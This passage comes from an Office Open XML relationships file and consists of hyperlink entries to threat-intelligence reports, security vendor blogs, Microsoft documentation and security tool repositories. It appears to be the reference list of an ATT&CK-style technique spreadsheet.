Target="https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags" TargetMode="External"/><Relationship Id="rId1925" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x2A.html" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html" TargetMode="External"/><Relationship Id="rId2187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssh.com/ssh/authorized_keys/" TargetMode="External"/><Relationship Id="rId2394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack" TargetMode="External"/><Relationship Id="rId780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" TargetMode="External"/><Relationship Id="rId2047" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures" TargetMode="External"/><Relationship Id="rId2254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/" TargetMode="External"/><Relationship Id="rId2461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/" TargetMode="External"/><Relationship Id="rId2699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ItsReallyNick/status/850105140589633536" TargetMode="External"/><Relationship Id="rId3000" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.megasecurity.org/papers/Rootkits.pdf" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.coresecurity.com/corelabs-research/open-source-tools/impacket" TargetMode="External"/><Relationship Id="rId878" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html" TargetMode="External"/><Relationship Id="rId1063" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/" TargetMode="External"/><Relationship Id="rId1270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/" TargetMode="External"/><Relationship Id="rId2114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.recordedfuture.com/identifying-cobalt-strike-servers/" TargetMode="External"/><Relationship Id="rId2559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb491007.aspx" TargetMode="External"/><Relationship Id="rId2766" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/" TargetMode="External"/><Relationship Id="rId2973" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats" TargetMode="External"/><Relationship Id="rId640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dragos.com/resource/hexane/" TargetMode="External"/><Relationship Id="rId738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclypsium.com/wp-content/uploads/2020/12/TrickBot-Now-Offers-TrickBoot-Persist-Brick-Profit.pdf" TargetMode="External"/><Relationship Id="rId945" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/" TargetMode="External"/><Relationship Id="rId1368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/ms679687.aspx" TargetMode="External"/><Relationship Id="rId1575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing" TargetMode="External"/><Relationship Id="rId1782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb491010.aspx" TargetMode="External"/><Relationship Id="rId2321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/" TargetMode="External"/><Relationship Id="rId2419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies" TargetMode="External"/><Relationship Id="rId2626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/" TargetMode="External"/><Relationship Id="rId2833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=1588" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control" TargetMode="External"/><Relationship Id="rId805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.troopers.de/troopers19/agenda/fpxwmn/" TargetMode="External"/><Relationship Id="rId1130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/posts/observations-of-itg07-cyber-operations/" TargetMode="External"/><Relationship Id="rId1228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/" TargetMode="External"/><Relationship Id="rId1435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/pam_unix" TargetMode="External"/><Relationship Id="rId1642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx" TargetMode="External"/><Relationship Id="rId1947" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure" TargetMode="External"/><Relationship Id="rId2900" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/" TargetMode="External"/><Relationship Id="rId3095" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.xorrior.com/No-Place-Like-Chrome/" TargetMode="External"/><Relationship Id="rId1502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" TargetMode="External"/><Relationship Id="rId1807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf" TargetMode="External"/><Relationship Id="rId2069" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware" TargetMode="External"/><Relationship Id="rId3022" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man1/mailx.1p.html" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&amp;utm_medium=email&amp;_hsmi=132931006&amp;_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&amp;utm_content=132931006&amp;utm_source=hs_automation" TargetMode="External"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc" TargetMode="External"/><Relationship Id="rId2276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/research/threat-profiles/iron-hunter" TargetMode="External"/><Relationship Id="rId2483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" TargetMode="External"/><Relationship Id="rId2690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/NickTyrer/status/958450014111633408" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" TargetMode="External"/><Relationship Id="rId662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" TargetMode="External"/><Relationship Id="rId1085" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.google.com/a/answer/166870?hl=en" TargetMode="External"/><Relationship Id="rId1292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Certutil/" TargetMode="External"/><Relationship Id="rId2136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/detections/osx-thiefquest/" TargetMode="External"/><Relationship Id="rId2343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/" TargetMode="External"/><Relationship Id="rId2550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490991.aspx" TargetMode="External"/><Relationship Id="rId2788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/" TargetMode="External"/><Relationship Id="rId2995" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom" TargetMode="External"/><Relationship Id="rId967" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gnu.org/software/acct/" TargetMode="External"/><Relationship Id="rId1152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22" TargetMode="External"/><Relationship Id="rId1597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/" TargetMode="External"/><Relationship Id="rId2203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sectools.org/tool/nbtscan/" TargetMode="External"/><Relationship Id="rId2410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" TargetMode="External"/><Relationship Id="rId2648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" TargetMode="External"/><Relationship Id="rId2855" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/" TargetMode="External"/><Relationship Id="rId827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf" TargetMode="External"/><Relationship Id="rId1012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/PSPKIAudit" TargetMode="External"/><Relationship Id="rId1457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/telegram-malware-iranian-espionage" TargetMode="External"/><Relationship Id="rId1664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/dd939934.aspx" TargetMode="External"/><Relationship Id="rId1871" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://digital.nhs.uk/cyber-alerts/2020/cc-3633" TargetMode="External"/><Relationship Id="rId2508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html" TargetMode="External"/><Relationship Id="rId2715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF" TargetMode="External"/><Relationship Id="rId2922" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://research.zscaler.com/2015/08/chinese-cyber-espionage-apt-group.html" TargetMode="External"/><Relationship Id="rId1317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/coreservices/launch_services" TargetMode="External"/><Relationship Id="rId1524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697" TargetMode="External"/><Relationship Id="rId1731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1" TargetMode="External"/><Relationship Id="rId1969" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=2011" TargetMode="External"/><Relationship Id="rId1829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist" TargetMode="External"/><Relationship Id="rId2298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia" TargetMode="External"/><Relationship Id="rId3044" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/decalage2/oletools" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/" TargetMode="External"/><Relationship Id="rId684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/" TargetMode="External"/><Relationship Id="rId2060" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices" TargetMode="External"/><Relationship Id="rId2158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/" TargetMode="External"/><Relationship Id="rId2365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf" TargetMode="External"/><Relationship Id="rId891" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html" TargetMode="External"/><Relationship Id="rId989" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/m0nad/Diamorphine" TargetMode="External"/><Relationship Id="rId2018" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/inguardians/peirates" TargetMode="External"/><Relationship Id="rId2572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/" TargetMode="External"/><Relationship Id="rId2877" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Root_certificate" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/" TargetMode="External"/><Relationship Id="rId751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/" TargetMode="External"/><Relationship Id="rId849" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html" TargetMode="External"/><Relationship Id="rId1174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/" TargetMode="External"/><Relationship Id="rId1381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/" TargetMode="External"/><Relationship Id="rId1479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" TargetMode="External"/><Relationship Id="rId1686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0" TargetMode="External"/><Relationship Id="rId2225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/" TargetMode="External"/><Relationship Id="rId2432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/" TargetMode="External"/><Relationship Id="rId611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitrustgroup.com/agent-tesla-keylogger/" TargetMode="External"/><Relationship Id="rId1034" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/network/ifconfig.go" TargetMode="External"/><Relationship Id="rId1241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/" TargetMode="External"/><Relationship Id="rId1339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man1/systemd.1.html" TargetMode="External"/><Relationship Id="rId1893" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html" TargetMode="External"/><Relationship Id="rId2737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA17-318B" TargetMode="External"/><Relationship Id="rId2944" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect" TargetMode="External"/><Relationship Id="rId709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ESETresearch/status/1311762215490461696" TargetMode="External"/><Relationship Id="rId916" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" TargetMode="External"/><Relationship Id="rId1101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thehackernews.com/2018/06/chinese-watering-hole-attack.html" TargetMode="External"/><Relationship Id="rId1546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" TargetMode="External"/><Relationship Id="rId1753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/" TargetMode="External"/><Relationship Id="rId1960" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" TargetMode="External"/><Relationship Id="rId2804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html" TargetMode="External"/><Relationship Id="rId1406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/" TargetMode="External"/><Relationship Id="rId1613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules" TargetMode="External"/><Relationship Id="rId1820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha" TargetMode="External"/><Relationship Id="rId3066" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20170720041203/http:/subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update" TargetMode="External"/><Relationship Id="rId1918" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" TargetMode="External"/><Relationship Id="rId2082" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles" TargetMode="External"/><Relationship Id="rId2387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore" TargetMode="External"/><Relationship Id="rId2594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://2015.zeronights.org/assets/files/05-Nosenko.pdf" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and" TargetMode="External"/><Relationship Id="rId773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://expel.io/blog/finding-evil-in-aws/" TargetMode="External"/><Relationship Id="rId1196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/reference/access-authn-authz/authorization/" TargetMode="External"/><Relationship Id="rId2247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/chafer-used-remexi-malware/89538/" TargetMode="External"/><Relationship Id="rId2454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf" TargetMode="External"/><Relationship Id="rId2899" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 